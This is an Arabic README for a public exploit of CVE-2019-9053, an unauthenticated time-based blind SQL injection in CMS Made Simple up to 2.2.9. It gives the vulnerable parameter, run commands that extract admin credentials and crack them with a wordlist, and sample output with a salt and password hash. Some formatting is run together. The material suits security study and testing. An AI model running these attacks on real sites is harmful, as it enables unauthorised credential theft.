
CVE-2019-9053 هو ثغرة حقن SQL أعمى قائم على الوقت (time-based blind) تؤثر على CMS Made Simple في الإصدارات ≤ 2.2.9. لا يتطلب مصادقة.
المعامل القابل للاستغلال هو m1_idlist في وحدة News (moduleinterface.php). يمكن للمهاجم استغلاله لاستخراج تجزئة كلمة مرور المسؤول، واسم المستخدم الخاص به، والبريد الإلكتروني، والملح (salt) المستخدم في التجزئة.
مخطط تخزين كلمات المرور هو MD5(salt + password)، حيث يبلغ طول الملح 8 بايت. وهذا يسمح، بمجرد الحصول على التجزئة والملح، بمحاولة كسر كلمة المرور دون اتصال باستخدام أدوات مثل hashcat أو John the Ripper.
CVSS 3.1: 7.5 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Daniele Scanu — @Certimeter Group
الاستغلال الأصلي موجود في Exploit-DB #46635.
requests, termcolorpip2 install requests termcolor
# استخراج بيانات الاعتماد (الملح، المستخدم، البريد الإلكتروني، تجزئة كلمة المرور)
python 46635.py -u http://target/cmsms
# استخراج بيانات الاعتماد ومحاولة كسر كلمة المرور باستخدام قائمة كلمات
python 46635.py -u http://target/cmsms --crack -w /path/to/rockyou.txt
يرسل الاستغلال طلبات HTTP بحمولات SQL تحتوي على SLEEP() لتحديد كل حرف على حدة:
cms_siteprefs حيث sitepref_name = 'sitemask'cms_users حيث user_id = 1cms_usersMD5(salt + password)[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: [email protected]
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
moduleinterface.php| الحقل | القيمة |
|---|
| CVE | CVE-2019-9053 |
| المنتج | CMS Made Simple |
| الإصدارات المتأثرة | ≤ 2.2.9 |
| النوع | حقن SQL أعمى قائم على الوقت (CWE-89) |
| المصادقة | غير مطلوبة |
| المتجه | moduleinterface.php?mact=News,m1_,default,0&m1_idlist= |
| التأثير | استخراج بيانات الاعتماد (المستخدم، البريد الإلكتروني، تجزئة كلمة المرور + الملح) |
| CVSS 3.1 | 7.5 HIGH |
| التصحيح | CMS Made Simple 2.2.10 |
| المعامل | الوصف |
|---|
-u / --url | عنوان URL الأساسي لنظام إدارة المحتوى (مثال: http://10.10.10.100/cms) |
-w / --wordlist | قائمة الكلمات لكسر كلمة المرور (اختياري) |
-c / --crack | تفعيل وضع كسر كلمة المرور |